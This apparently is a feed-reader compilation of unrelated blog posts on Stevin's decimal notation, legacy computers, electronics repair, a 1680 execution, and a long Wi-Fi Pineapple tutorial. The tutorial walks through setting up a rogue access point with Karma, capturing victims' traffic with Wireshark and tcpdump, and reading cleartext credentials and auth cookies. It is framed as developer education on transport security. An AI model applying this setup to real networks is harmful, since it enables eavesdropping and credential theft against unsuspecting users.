We can see in his expression that Boethius, on the left, is rather enjoying himself, knowing the superiority of his system of counting, which was the the Hindu-Arabic number notation--he definitely has a sly, self-appreciating smile on his face.  Pythagoras, working with the old counting table, definitely looks worried, or at least unhappy, unsettled.  Never mind that Pythagoras (570-495 b.c.e., none of whose works exist in the original, another sort of entry in our Blank History category) was at a definite disadvantage in the calculating department, being dead and all that for hundreds of years before the Arabic notation was more widely introduced in the West, probably being introduced by Pisano/Fibonnaci in the 12th century.  But it does fall to Boethius, the smirker, to have introduced the digits into Europe for the very first time, deep into the history of the Roman Empire, in the 6th century.

The numerical stand-ins in the Reisch book with which Pythagoras worked were blank, coin-like slugs used as placeholders, and would be used in place of rocks or pebbles or whatever other material was at hand. It is interesting to note that the Latin expression, "calculos ponere", which basically means "to calculate"or "to compute", is more literally translated into  "to set counters" or "to place pebbles" (upon a counting board) or to set an argument2,  which is exactly what some of the Roman daily reckoners would do at their work. And also used, in this case, by the unhappy Pythagoras.

The foundation for the .14159... that comes to the right of the integer 3 in pi is a relatively recent idea in the history of the maths--at least so far as the represrntation of the ideas in numbers and the decimal point is concerned. 

Simon Stevin (1548-1620) introduced the idea of decimal numbers in his 36-page De Thiende ('The Art of Tenths"1) in 1585, an idea that replaced much more cumbersome earlier methods of representation.  So, the number 3.14159 would be written in the Stevein notation as (where in this case numbers enclosed by brackets, i.e. "[9]" would have been represented in print as a 9 within a circle) 3[0]1[1]4[2]1[3]5[4]9[5].  It is also seen here:

Stevin decimal
[Source:  math Words, here.]

Stevin decimals[Full text available here.]

The importance of the introduction of this idea is difficult to underestimate, according to many and by example the  The Princeton Companion to Mathematics by Timothy Gowers:

The Flemish mathematician and engineer Simon Stevin is remembered for
his study of decimal fractions. Although he was not the first to use
decimal fractions (they are found in the work of the tenth-century
Islamic mathematician al-Uqlidisi),it was his tract De Thiende (“The tenth”), published in 1585 and translated into English (as Disme: The Art of Tenths, or Decimall Arithmetike Teaching ) in 1608, that led to their widespread adoption in
Europe. Stevin, however, did not use the notation we use today. He drew
circles around the exponents of the powers of one tenth: thus he wrote
7.3486 as 7�3�4�8�6�4. In
De Thiende Stevin not only demonstrated how
decimal fractions could be used but also advocated that a decimal system
should be used for weights and measures and for coinage.

This idea would be further developed by Bartholomeus Pitiscus (1561-1613) who was the first to introduce the decimal point in 16123.   It was a far more robust and simple was of dealing with decimal notation than anything that had come before.

Notes:

1. Decimal arithmetic: Teaching how to perform all computations whatsoever by whole numbers without fractions, by the four principles of common arithmetic: namely, addition, subtraction, multiplication, and division

2. The Reisch book is remarkable: it is basically a Renaissance encyclopedia of general knowledge, divided into twelve books:  grammar, dialectics, rhetoric, arithmetic, music, geometry, astronomy, physics, natural history, physiology, psychology,  and ethics.

3. Pitiscus was also the first to introduce the term "trigonometry" earlier in 1595 in a highly important and influential work he produced in 1595.

17 Apr 13:18

If It Ain't Broke, Don't Fix It: Ancient Computers in Use Today

It’s easy to wax nostalgic about old technology--to remember fondly our first Apple IIe or marvel at the old mainframes that ran on punched cards. But no one in their right mind would use those outdated, underpowered dinosaurs to run a contemporary business, let alone a modern weapons system, right?

Wrong!

While much of the tech world views a two-year-old smartphone as hopelessly obsolete, large swaths of our transportation and military infrastructure, some modern businesses, and even a few computer programmers rely daily on technology that hasn’t been updated for decades.

If you’ve recently bought a MetroCard for the New York City Subway or taken money from certain older ATMs, for instance, your transaction was made possible by IBM’s OS/2, an operating system that debuted 25 years ago and faded out soon after.

A recent federal review found that the U.S. Secret Service uses a mainframe computer system from the 1980s. That system apparently works only 60 percent of the time. Here’s hoping that uptime statistics are better for the ancient minicomputers used by the U.S. Department of Defense for the Minuteman Intercontinental Ballistic Missile system, Navy submarines, fighter jets, and other weapons programs. Those systems, according to the consultants who help keep them going, will likely be used until at least the middle of this century.

Here are a few stories of the computers that time forgot, and the people and institutions that stubbornly hold on to them.

Punch-Card Accounting

Sparkler Filters of Conroe, Texas, prides itself on being a leader in the world of chemical process filtration. If you buy an automatic nutsche filter from them, though, they’ll enter your transaction on a “computer” that dates from 1948.

If It Ain't Broke, Don't Fix It: Ancient Computers In Use Today
Sparkler Filters' IBM 402, with self-employed field engineer Duwayne Leafley in the foreground. (Photo Courtesy Ed Thelen / IBM 1401 Group)
Sparkler’s IBM 402 is not a traditional computer, but an automated electromechanical tabulator that can be programmed (or more accurately, wired) to print out certain results based on values encoded into stacks of 80-column Hollerith-type punched cards.

Companies traditionally used the 402 for accounting, since the machine could take a long list of numbers, add them up, and print a detailed written report. In a sense, you could consider it a 3000-pound spreadsheet machine. That's exactly how Sparkler Filters uses its IBM 402, which could very well be the last fully operational 402 on the planet. As it has for over half a century, the firm still runs all of its accounting work (payroll, sales, and inventory) through the IBM 402. The machine prints out reports on wide, tractor-fed paper.

If It Ain't Broke, Don't Fix It: Ancient Computers In Use Today
The punched cards used in the 402, with some mangled cards from a recently cleared jam in the card reader. The cards sit on the IBM 029 key-punch machine. (Photo Courtesy Ed Thelen / IBM 1401 Group)

Of course, before the data goes into the 402, it must first be encoded into stacks of cards. A large IBM 029 key-punch machine--which resembles a monstrous typewriter built into a desk--handles that task.

Carl Kracklauer, whose father founded Sparkler Filters in 1927, usually types the data onto the punch cards. The company sticks with the 402 because it's a known entity: Staffers know how to use it, and they have over 60 years of company accounting records formatted for the device.

The key punch isn't the only massive accessory in Sparkler's arsenal. The 402 also links to an IBM 514 Reproducing Punch, which has been broken for three years. When it works properly, the 514 spits out punched "summary cards," which typically contain the output of the 402's operation (such as sum totals) for later reuse. Sparkler stores all of its punched data cards--thousands and thousands of them--in stacks of boxes.

If It Ain't Broke, Don't Fix It: Ancient Computers In Use Today
Sparkler Filters' collection of IBM 402 programs on IBM plugboards. (Photo Courtesy Ed Thelen / IBM 1401 Group)

The company also possesses dozens of 402 programs in the form of IBM plugboards. Computer programming in the 1940s commonly involved arranging hundreds of individual wires in a way that would likely drive a modern software engineer insane. In the 402's case, a spaghetti-like pattern of wires attached to hundreds of connectors on each plugboard determines the operation of the machine, and different plugboards can be pulled out and replaced as if they were interchangeable software disks. So you might insert one plugboard for handling, say, accounts receivable, and a different one for inventory management.

Sparkler’s 402 is a such a significant computing relic that the Computer History Museum in Mountain View, California, sent a delegation to the company last year to try and convince its executives to move to a more modern accounting system and donate the 402 to the museum. That will someday be an appropriate resting place for the 402, but as long as it still does its duty, the Texas company has no problem keeping its digital dinosaur living a little while longer.

Next: Modern military weapons run on ancient minicomputers.

11 Apr 00:32

Will we be repairing our iPods a hundred years from now?

by Jacob

Well, in a hundred years, I’ll probably be death (“Lost off the coast of … in a hurricane”), so this question is mainly relevant for our descendants [for those of you who have such].

In a recent post on the future, frugal bachelor commented:

I doubt the IPOD will be repaired in any conventional sense, yes the raw materials are valuable, it will make more sense to melt the whole thing down and recreate it from scratch. If in 100 years people will take apart an IPOD have a soldering iron and hook an oscilloscope, then we are truly screwed.

Now, it is quite possible that we are truly screwed. I will consider the peak oil predictions well known. Usually, economists, politicians, computer scientists, and other people with no grasp of reality will comment that the economy can grow regardless of falling energy output, this is referred to as increasing the energy intensity. True, if you outsource the energy costs to other countries.

The fact is that running electronics is quite cheap. However, building said electronics, that is, microchips in particular (let’s have a moment of silence for PV panels), is enormously expensive in terms of energy. Depending on exactly how high the price of energy goes, we may very well see a salvage operation and a repair of consumer electronics that goes beyond today’s efforts. And once those chips die, you might not see another one.


Copyright © 2007-2014 earlyretirementextreme.com
This feed is for personal, non-commercial use only.
The use of this feed on other websites breaches copyright. If you see this notice anywhere else than in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint: 47d7050e5790442c7fa8cab55461e9ce)
17 Apr 10:26

The beginners guide to breaking website security with nothing more than a Pineapple

by Troy Hunt

You know how security people get all uppity about SSL this and SSL that? Stuff like posting creds over HTTPS isn’t enough, you have to load login forms over HTTPS as well and then you can’t send auth cookies over HTTP because they’ll get sniffed and sessions hijacked and so on and so forth. This is all pretty much security people rhetoric designed to instil fear but without a whole lot of practical basis, right?

That’s an easy assumption to make because it’s hard to observe the risk of insufficient transport layer protection being exploited, at least compared to something like XSS or SQL injection. But it turns out that exploiting unprotected network traffic can actually be extremely simple, you just need to have the right gear. Say hello to my little friend:

 

Wi-Fi Pineapple

This, quite clearly, is a Pineapple. But it’s not just any pineapple, it’s a Wi-Fi Pineapple and it has some very impressive party tricks that will help the naysayers understand the real risk of insufficient transport layer protection in web applications which, hopefully, will ultimately help them build safer sites. Let me demonstrate.

What is this “Pineapple” you speak of?!

What you’re looking at in the image above is a little device about the size of a cigarette packet running a piece of firmware known as “Jasager” (which over in Germany means “The Yes Man”) based on OpenWrt (think of it as Linux for embedded devices). Selling for only $100, it packs Wi-Fi capabilities, a USB jack, a couple of RJ45 Ethernet connectors and implements a kernal mode wireless feature known as “Karma”.

Huh? This is starting to slip into the realm of specialist security gear which is increasingly far away from the everyday issues we deal with as software developers. But it’s exceptionally important because it helps us understand in very graphic terms what the risk of insufficient transport layer protection really is.

The easiest way to think of the Pineapple is as a little device that sits between an unsuspecting user’s PC (or iPhone or other internet connected device) and the resource they’re attempting to access. What this means is that an attacker is able to launch a “Man in the Middle” or MiTM attack by inspecting the data that flow between the victim and any resources they’re accessing on the web. The physical design of the Pineapple means that victims can connect to it via its Wi-Fi adapter and it can connect to a PC with an internet connection via the physical Ethernet adapter. It all looks a bit like this:

Launching an MiTM attack with the Pineapple

This isn’t the only way of configuring the thing, but being tethered to the attacker’s PC is the easiest way of understanding how it works. The point of all this is that it helps tremendously in understanding the risk of insufficient transport layer protection because ultimately, it’s websites that don’t do a good enough job of this that put the victim at risk. More on that later.

But why on earth would a victim connect to the Pineapple in the first place?! Well firstly, we’ve become alarmingly accustomed to connecting to random wireless access points whilst we’re out and about. When the average person is at the airport waiting for a flight and sees an SSID named “Free Airport Wi-Fi”, what are they going to do? Assume it’s an attacker’s honeypot and stay away from it or believe that it’s free airport Wi-Fi and dive right in? Exactly.

But of course that’s still a very conscious decision on behalf of the user. As it turns out, the Pineapple packs a much more subversive party trick to lure unsuspecting victims in…

Karma, baby

The Karma feature is best explained on the Pineapple website:

Most wireless devices including laptops, tablets and smartphones have network software that automatically connects to access points they remember. This convenient feature is what gets you online without effort when you turn on your computer at home, the office, coffee shops or airports you frequent. Simply put, when your computer turns on, the wireless radio sends out probe requests. These requests say "Is such-and-such wireless network around?" The WiFi Pineapple Mark IV, powered by Jasager -- German for "The Yes Man" -- replies to these requests to say "Sure, I'm such-and-such wireless access point - let's get you online!"

Wait, what?! So devices just randomly connect to the Pineapple thinking it’s a legitimate AP? Yep, here it is in detail:

Karma saying it is the device's preferred network

Simple, huh? The problem is that wireless devices are just too damn trusting. Once they establish a connection with an access point they usually happily reconnect to it at a later date. Of course if it’s a protected network they still need to have the right wireless credentials, but if it’s an open network then the Pineapple asks for no such thing, it just lets the device straight in whether the device thinks it’s connecting to a legitimate access point or not.

So that’s how she works, a combination of simply providing an access point that victims connect to on their own free will or being tricked into connecting via Karma. Let’s get it setup and see it all in action.

Windows tethering

The easiest way to access the device and get started with configuring everything is to tether it to a PC with two network interfaces. This can be one with a couple of NICs connected to Ethernet or in most cases (and as with the diagram above), a laptop which commonly has a wired NIC and a wireless one.

What we’re going to do is configure the wired Ethernet NIC which we’ll plug the Pineapple into then share the connection on the wireless adapter so that the traffic from the Pineapple can be routed through it, effectively just passing everything through the PC. This is all pretty straight forward and it starts out from the Network Connections settings:

Network Connections in Windows

Just one little note before proceeding: I’m going to obfuscate any SSIDs or MAC addresses used in this post with a grey box simply because they explicitly tie back to my devices (or my neighbours’ devices!) and I’m not real keen on publicly identifying them. Who knows what they might get up to in future…

Jump into the properties of the wireless adapter, and head over to the sharing tab then make sure that “Allow other network users to connect through this computer’s Internet connection” is checked:

Allow other network users to connect through this computer’s Internet connection

That’s that adapter done, now let’s do the wired one. Jump into the properties locate the “Internet Protocol Version 4 (TCP/IPv4)” item:

Internet Protocol Version 4 (TCP/IPv4)

Now grab the properties of that guy and configure a static IP address and subnet mask and set the DNS server as follows:

Static IP address on 172.16.42.42, subnet mask on 255.255.255.0 and DNS on 8.8.8.8

That’s it – job done.

Accessing the device

Once tethering is setup and the Pineapple is connected to Ethernet via its PoE LAN port, you should be able to access the Pineapple directly from within your browser via the IP address. You can hit it on 172.16.42.1/pineapple or if running a newer version of the firmware (more on that later), the IP address and port 172.16.42.1:1471. All things going well, you’ll be challenged to authenticate:

Authenticating to the Pineapple

The default credentials are username “root” and password “pineapplesareyummy” after which you should be in:

The Pineapple browser UI

That’s the first bit done, tethering is working and we can actually access the device, now for a bit of preparation.

Housekeeping

Before you start anything, get the firmware up to date. If I’m honest, I’m always scared about updating any firmware on any device because when it goes wrong it’s often a whole world of pain to get yourself back out of trouble again. You’re much better off doing this before you create any dependencies on the device or configure anything. I had a couple of glitches doing mine and it took a few goes, but in theory, you jump over to the “Upgrade” link on the nav, hit “Check for Upgrades” then if required, pull down a package, enter the MD5 hash of it (provided on the upgrade site) and upload the package:

The upgrade interface

One little thing you want to remember here: if like me, your GUI was originally accessed via 172.16.42.1/pineapple, keep in mind the newer version of the firmware now puts the GUI behind a port so you want to hit 172.16.42.1:1471 instead. If, also like me, you try hitting the old address after the install and reboot you’ll keep getting redirected and not much will happen. Then you’ll think you’ve rooted your device (that’s the Australian rooted, not the American one) and start wondering how in the hell you’re ever going to get it back to a known good state and, well, just remember the port change!

Next up, jump into configuration and change the default SSID. The device is configured to show “pineapple” followed by the first and last octets of the Wi-Fi adapter. Change it to something a little more subtle and make it persistent so that when you fire it back up later you’re not reverting to the default:

Changing the SSID

The other thing you want to do on the configuration page is to blacklist the MAC address of the machine you’re going to be orchestrating the Pineapple from and any other devices you don’t want inadvertently connecting to it. This is important if you don’t want to “Pineapple yourself”! Seriously though, it can get very confusing otherwise so this makes good sense.

Blacklisting a MAC address

Lastly, let’s change that default password, the last thing you want is someone else taking over your Pineapple whilst you’re pretending to be a l33t hax0r! Over to the “Advanced” link then down to the bottom of the page:

Changing the default password

That’s pretty much it for what I felt need to be configured via the UI, let’s go and get a bit low-level and enter the command shell.

SSH’ing in

This is where it gets a bit scary for Windows people! Keeping in mind that the Pineapple is ultimately just a little Linux box with some fancy party tricks, there are times when you’ll need to get your hands dirty and enter the secure shell world. This is something I do very, very rarely and if memory serves me correctly, it was 1999 when I last regularly used a *nix machine so it was pretty unfamiliar territory for me as well.

Moving on, one of the easiest way of SSH’ing into the device from Windows is to go and grab PuTTY. With this in hand, the only configuration you need is the IP address of the device:

Using PuTTY to SSH into the Pineapple

Open the connection and you’re into the shell:

Into SSH mode on the Pineapple

Follow the instructions in the screen above enough times and suddenly the shell doesn’t seem to look so bad!

Keep in mind that this is the OpenWrt distro of Linux and being intended for embedded devices, it’s a pretty lean edition. Don’t expect to find all the features you’d normally see in a full blown desktop edition – many of them are not there so keep that in mind when attempting to use commands that might not be supported.

Once you’re SSH’d in you can go ahead and set the time and time zone correctly. This’ll be well outside your comfort zone if Linux shells are a bit foreign to you (and admittedly I had to look much of this up again), so here’s the whole thing step-by-step:

  1. Change the directory to /etc/config: cd /etc/config
  2. Edit the config file in vi: vi config
  3. Navigate down to the “option timezone” line and delete out the existing “UTC” value (unless, of course, you are in the UTC time zone!)
  4. Jump over to the timezones table on the OpenWrt site and find the appropriate one for your location.
  5. Enter the value from the “TZ string” column into the shell: Hit the “i” key to insert then type away

    It should look kinda like this when you’re done:

    New timezone
  6. Save the file: Hit the esc key to stop editing then :wq<enter>
  7. Reboot the Pineapple: reboot <enter>

A little tip for new players: every time I tried saving the config change I got the following message and nothing actually saved:

Error when saving timezone

This, quite clearly, means that there is no available capacity on the device and after wasting considerable time trying to work out why I couldn’t use vi correctly, this become quite clear. Welcome to Linux!

Working with ext4 format and USB drives

You’ve got very little space on the device, there’s literally only an 8MB ROM and 32MB of RAM so by the time you load everything into there just required for the device to run, there’ve not much left. It’s certainly not going to be enough to start doing fancy things like storing packet captures which mount up very quickly.

Fortunately it’s all expandable via USB so one of the first things you want to do is grab a spare thumb drive and get it ready for the Pineapple. But there’s a catch – as with many things Linux, this is a slightly different world to good old Windows so you can’t just take your NTFS formatted USB stick and chuck it in, you’ll need to partition it for ext4.

In theory, this is easy enough to do in the Windows world using a tool such as MiniTool Partition Wizard. That sounds just fine – except it’s not and you will only discover this through either banging your head against the wall for hours or reading what comes next. Whilst the aforementioned tool (and I assume others like it running on Windows) seemed like a good idea, I just couldn’t get it to play nice. I’ll spare you the detail as I’ve captured them all on the Hak5 forum, but in short, the USB would mount and be readable from shell but I could never install Infusions to it (think of them as apps for the Pineapple) which I’ll come to shortly. It turns out that additional partitions were being created and that simply made things not play nice with the Pineapple despite no obvious warnings to that effect.

The solution turns out to be that I needed to create the ext4 partition directly from a Linux machine. If this world is unfamiliar to you, there’s a (relatively) low friction process courtesy of an Ubuntu LiveCD. This involves downloading an Ubuntu ISO, burning it to CD (or DVD or bootable USB), running up an in-memory instance of Ubuntu and partitioning the USB from there. I then followed the guidance provided in the very easy to follow page on enabling USB mass storage with swap partition as the swap partition looks like will come in handy later on when you want to start doing some other tricks with the Pineapple.

That sounds like a hassle – running up an entire new operating system just to partition a USB drive – and certainly it was a drama getting to the point of realising that’s what I needed to do, but once you know what needs to be done it’s quite simple. Of course it would have been even simpler if I had a handy Linux machine hanging around somewhere and for many people, that will already be the case.

Once it’s all setup you should see the storage appear under the “USB” menu item like so:

USB drive listed

You’ll also probably want to read from the drive back on your Windows machine at some point (I’ll save some packet captures to it a little later on) and I found DiskInternals Linux Reader did the job just fine.

Testing connectivity

Now that we’ve got everything ready to roll, let’s jump into the fun stuff! Back in that first screen grab of the UI, only the “Wireless” and “Cron Jobs” services were running so let’s fire up “Mk4 Karma” and set it to run automatically via the “Autostart” feature so the device just needs to be powered up for everything to kick into action:

Enabling services

Now we should be able to jump over to a device such as my iPhone and see some new SSIDs:

iPhone seeing the "trust me" SSID

This is a whole lot more interesting once you understand what’s under the grey box (which again, I’ve deliberately obfuscated), so let me explain what’s happening; each unsecured network is the Pineapple responding to a probe request from the iPhone with the name of the SSID it was previously associated with. The names include that of an old wireless router I replaced some years back, my parents’ network I was connected to interstate just the other day and an airline lounge in a far flung corner of the world. All of the secured networks are legitimate (mine, my neighbour’s, etc.)

We’re also seeing the new SSID of the Pineapple that I set earlier (“trust me”) and I’ve gone ahead and explicitly connected to that for demonstration purposes. This now makes the homepage of the GUI much more interesting:

List of probe requests from and MAC addresses from different devices

What’s particularly interesting is what you can’t see which are all the SSIDs being probed for. These are predominantly APs I’ve connected to in the past and the MAC addresses doing the probing are predominantly my own (the Wi-Fi strength on the Pineapple is not great so I’m seeing mostly nearby devices), but you do see a few unfamiliar ones pop up which are clearly other people’s devices. It does make you wonder what risks might be present from devices leaking SSID names they’ve previously associated to; “Why is my colleague’s Android trying to connect to ‘Mistress Angeliques BDSM Palace’?!”

Anyway, right at the end of the above image you can see the association of my iPhone to the Pineapple which means we can now drill down and get a detailed report of what’s going on:

Details of iPhone connected to the Pineapple

This is mostly self-explanatory, the signal strength is kind of interesting as it starts to give you a sense of the distance the victim might be from the device. Of course what will be really interesting is the rx bytes – that’s about one a half MB that the phone has already received through the Pineapple and under normal operating conditions, the user would have absolutely no idea there was an MiTM. Let’s move on to taking a sneaky look at those packets because that’s where things get really interesting!

Packet capturing

Now that we’ve got all the nuts and bolts in place, let’s start capturing the data. There are a couple of different ways of doing this and probably the simplest is to monitor the traffic moving through the Ethernet adapter on the attacker’s PC. Once we start getting into the realm of traffic monitoring we need to start looking at packets and the best way to do this on a PC by a long shot is to use Wireshark.

One of the best thing about Wireshark is that it’s free. This is no lightweight tool either, Wireshark is very full featured and is arguably the de facto standard for monitoring, capturing and analysing packets flying around a network. As powerful as Wireshark is, it’s also relatively easy to get started, just fire it up, choose the network interface you want to capture which in this case is the Ethernet adaptor (remember, this is the NIC the Pineapple is connected to) then jump down to the “Capture Options” button:

Starting Wireshark to monitor traffic from the Pineapple

The capture options start to give you an idea of the extent of the configurability but we’ll just leave all that as default and start the capture:

Wireshark capture options

Once started, you should immediately begin to see packets flowing through the NIC:

Wireshark packets captured from the Pineapple

Right about here the penny should drop – this is someone else’s traffic! Ok, it’s really my own traffic from my iPhone but of course as we now know, the Pineapple has the ability to easily trick a victim into connecting to it whether deliberately or by default as their device looks for familiar SSIDs. Long story short is that this could just as easily be someone else’s traffic.

I’m not going to delve into exactly what we can do with that traffic right now because I have subsequent posts planned that will demonstrate that, for now though let’s just filter that traffic down to something a bit more familiar – HTTP. You see, the traffic above includes a whole bunch of different protocols which for the purposes of talking about secure website design aren’t going to be of much use. Let’s add in a filter of “http” and load up a popular website with developers:

HTTP requests to Stack Overflow being captured

As I’ve written before, Stack Overflow serves everything outside the logon over HTTP so it’s easy to monitor that traffic (including the authentication cookie). Once the traffic is captured, you can either save it as a PCAP file for later analysis or right click and follow the TCP stream which then gets you into the entire request and response (including the headers with those valuable auth cookies):

Following the TCP stream of the request and response

I’ll stop there because that’s enough to demonstrate that everything is working as expected. Just to illustrate the power of the Pineapple, as I was writing this piece and watching the Wireshark traffic, a whole bunch of packets started appearing that weren’t mine:

My wife's MacBook Air connecting to the Pineapple

Turns out that my wife had wandered into range with her MacBook Air and it had automatically associated to the SSID “Apple Demo” which I can only assume is the access point the Apple store connected her to when walking her through the shiny new machine she recently bought. So there you go – right out of the box a brand new machine is already falling victim to the Pineapple without even trying.

Infusions and unattended packet capturing with tcpdump

This is the last configuration I want to touch on simply because it covers couple of important points: Infusions and using the USB drive we setup earlier. With these concepts understood I actually feel reasonably well-equipped to use the thing so they’re worth capturing here.

The physical capabilities of the Pineapple should be pretty clear by now but what might not be quite as clear to the uninitiated is what can now be achieved with clever software. I’ll write a lot more about these capabilities in the future but for now I want to just take a quick look at the concept of Infusions.

Think of Infusions as apps and the Pineapple Bar as an app store for the Pineapple only with a couple of dozen apps that are all free. The Infusions cover a variety of different domains from informational to potentially malicious so there’s a good range of use cases in there. It’s accessible via the Pineapple from the “Pineapple Bar” link in the nav and it gives you some options like so:

List of Infusions

As you can see, I’ve already installed the “status” Infusion and by way of example, here’s the sort of info you get from it:

The status Infusion

This can be pretty handy info in GUI format, there are also some neat real time graphs for things like CPU utilisation and bandwidth:

image

The really interesting one, however, is tcpdump. Now tcpdump is not an Infusion in and of itself, it’s an existing project which has been turned into an Infusion so that’s easily installable on the Pineapple and can then be managed from the GUI. What tcpdump offers is the ability to effectively do what we just did with Wireshark in terms of packet capturing but to do so locally within the device itself. What this means is that you can have the Pineapple independently capture traffic without needing to run Wireshark on a PC. In fact if you establish a connection from the Pineapple directly to the web (and there are several ways to do this), you don’t need a PC at all. Imagine just that little cigarette pack sized Pineapple sitting there on its own with its own power source and internet connection and any victims within Wi-Fi shot of it automatically connecting and having their packets captured. That’s powerful stuff.

Now that we have a correctly partitioned USB drive, Infusions can be installed directly to there:

image

Incidentally, it’s that highlighted “USB Storage” link that I never saw when creating the ext4 partition in Windows.

The thing with packet captures is that there can be a lot of them and they can chew up space really quickly depending on how liberal you are with the data you want to save. You can configure tcpdump to filter out a lot of the “noise” packets and restrict it to, say, only HTTP traffic or even just only to HTTP requests using the POST verb. For now though we’ll just run it up with the defaults to capture all the traffic running through the wired LAN port:

Capturing TCP traffic using tcpdump

You can now sit back and let the traffic flow whilst the Pineapple captures everything anyone connected to it sends across the wire (or air, as it may be). With the iPhone connected, I browsed over to a site I know doesn’t properly protect user credentials and attempted to logon. Once done you can hit “Stop” and you’ll see a summary of the captured data:

Captured packets from tcpdump

Now we can jump over to the “History” tab and download the PCAP file:

Viewing the tcpdump history

That PCAP file is just the same as what we captured in Wireshark earlier on and you can now load it back up into Wireshark and analyse it in just the same way as you would the packets it captured directly. Alternatively, you can pull the USB out, chuck it into the PC and read it with a tool like DiskInternals which I mentioned earlier. Here’s what we can now see from my brief visit to the site

Login credentials sent in unprotected GET request

This site is particularly bad because the credentials just go into a GET request but of course the real story in the context of the Pineapple is that the whole thing is sent in the clear so it’s now easy to see everything sent by the victim and returned by the server. Keep in mind that this was all captured directly on the Pineapple (or at least on the USB) so the whole thing is now pretty well self-contained. That’s a good place to end the traffic capture for today, there’ll be much more in the future though…

Other miscellaneous info

For those of you thinking of getting yourself into a Pineapple (and I know there are a few based on Twitter chats alone), there are a couple of pre-purchase things worth pointing out. Firstly, I went el-cheapo and only got the device itself without any accessories. This means you get an AC adaptor for power and that’s it so it’s definitely not mobile.

Being able to take the Pineapple out in the wild definitely presents all sorts of opportunities not available while it’s plugged in to the mains so the USB battery pack is a must. As the name suggests, this also gives you the ability to power the device directly from USB so you can just plug it into your laptop if the juice in the battery runs out.

The other thing is that the Wi-Fi strength is pretty ordinary. By way of example, here’s how inSSIDer sees the Pineapple (in yellow, of course) versus my usual access point in blue from only about a foot away:

image

However, mover into the next room and the Pineapple just about drops off altogether:

image

There are a few different antenna options so if your intended use doesn’t involve connecting to a target within a very, very close distance then this would be worth a look. Other than that though, the only other thing that might be useful is a handy case and given HakShop has a Pineapple with battery and a case going for $115 at the time of writing, that’s probably your best bet.

The other thing that some people might find interesting is that a bunch of the code running on the Pineapple is up on GitHub. This is apparently the www folder of the device so it’s not the firmware itself, but it is a bunch of the PHP files and scripts which is kind of interesting to have a browse through.

Responsible use

I bought the Pineapple for the sole purpose of helping developers better understand the risks of insufficient transport layer security. You’re going to see me writing a lot more about the risks of loading logon forms over HTTP, embedding HTTPS login forms in HTTP pages, mixed mode HTTP / HTTPS and other similar risks. The Pineapple will help me move that discussion from a theoretical “An attacker might do this or could do that” to a very practical “Here, let me show you exactly why that pattern is risky”. Demonstrations of this kind are very powerful and they’re often the only way of getting the message through.

However, there is very clearly scope for misuse and abuse of unsuspecting victims. That incident I mentioned earlier where my wife walked into the room and suddenly I was watching her network traffic is a perfect example of how easy it is to do potentially evil things, sometimes without even trying. For those reading this and considering how they might use it, there are some great use cases for penetration testing or demoing (in)secure web app design but there is also some very, very thin ice out there. Caveat emptor.

What next for the Pineapple?

The great thing about the Pineapple is that it makes it dead easy to demonstrate a whole bunch of concepts that I often write about but haven’t always shown in execution. For example, why it’s not ok to load login forms over HTTP even if they post to HTTPS. Another one that has come up a few times (including in the Top CashBack post) is not embedding a login form that is loaded over HTTPS within an iframe in an HTTP page. There’s a whole heap of things that will be easily demonstrated within a controlled environment.

Then there’s the uncontrolled environment – the public. There’s a lot of grey area there about what can be done for the purposes of research and education without crossing the line into outright eavesdropping and getting on the wrong side of people. I do have some thoughts on it, but I’ll hold onto those for the moment…

Regardless, I’ll start producing some video material to demonstrate the ease with which this thing does its work because it’s immensely impressive to see in real time – at least I was impressed! I’ve already created a bit of video for a training program I’m putting together (more on that another day), and I reckon it comes up great. Stay tuned, there’s much, much more to come.

Useful Links

  1. Markiv: What We Know And What We Don't Know – good general overview of features and configuration
  2. Mark 4 setup script – very handy for seeing how to configure various things via the shell.
  3. You just can't trust wireless: covertly hijacking wifi and stealing passwords using sslstrip – good view of defeating SSL with the device
  4. Main Wi-Fi Pineapple site - all things Pineapple start from here
17 Apr 08:52

1680: John Marketman, jealous chirurgeon

by Headsman

On this date in 1680, an unusual public execution took place in West Ham.

John Marketman (Manchetman) was a ship’s surgeon, which he spelled “chirurgeon” because it was olden days. Being away at sea gave him a lots of time to picture how his wife Mary Snerlin back home might be cuckolding him, and when he arrived back one time to apparent corroborating information, he went a little nutso.

According to the trial record from the spring 1680 Chelmsford Assizes,

the circumstances of the bloody Deed was sworn to as followeth, the Prisoner being newly come on Shore, having been at Sea for a considerable time, was informed that she had been over lavish of her Favours to a Neighbour of hers, being by profession a Shoemaker; he being newly come from Sea and coming home as it is said surprized her too familiar with the said Shoemaker, whereupon he in a Rage threatned [sic] her, yet notwithstanding the Rage of Jealousie, he seemed reconciled, but to the contrary retaining an inward hatred, which she perceiving, fled to a neighbours house, thinking to stay whilst his Anger was overpast, yet he with a seem’d Reconciliation, came to invite her home, and came up to her as if he would imbrace her, but with his bloody hands he stab’d her with a Knife under her Right Breast, about four inches deep,* of which Wound she in a little time died, only confessing her innocence, at his Trial he did not deny the Fact, and after his being convicted did confess his Rashness in proceeding on such Cruelty, without the least remorse, after he was found Guilty of wilful Murder and received Sentence of Death, he seemed exceeding Penitent, and did bewail his cruel Crime, shedding many Tears, that he had given himself over to the suggestions of the Prince of darkness, and so continued to the utmost.

There are somewhat different twists on the underlying facts of the case from different sources — like the profession of the alleged lover, and the question of whether Marketman caught them in flagrante delicto or merely heard town gossip, and the matter of whether he took revenge with cold calculation or in more of a drunken fury. Fill it out however you like; in outline we have one of the stock classics of homicide.

But at receiving his sentence, Marketman did something remarkable: he asked the judge to alter the sentence and be hung not at the usual execution spot in Chelmsford, but in West Ham — “the town where he did perpetrate the wicked act.”

Marketman, you could say, really went all-out from that very first moment to put on a full-dress, no-holds-barred scaffold performance par excellence. He should have been in the business of scripting deaths.

Besides hanging in West Ham, Marketman had his mother (“poor Soul drowned in Sorrow,” in the words of a pamphlet titled “True Narrative of the Execution of John Marketman”**) lead him personally to the gallows. There a minister preached on 2 Corinthians 7:9, “I rejoice, not because you were grieved, but because you were grieved into repenting” — demonstratively comforting Marketman that his imminent strangulation would stand “a monument to divine justice … in and thorow you, God sheweth the consequences of a sinful and wicked life.”

This was the evolving principle of executions as exemplary deterrence, and Marketman was ready to play the part in his final turn. He spoke for a long time, with the swooning mother right there as evidence, on how he

had been very disobedient to his too indulgent parents, and that he had spent his youthful days in profanation of the Sabbath and licentious evils of debaucheries beyond expression, and that he had been over penurious in his narrow observance of his wive’s ways, desirous that all should pray to the Eternal God for his everlasting welfare, and with many pious expressions ended this mortal life.

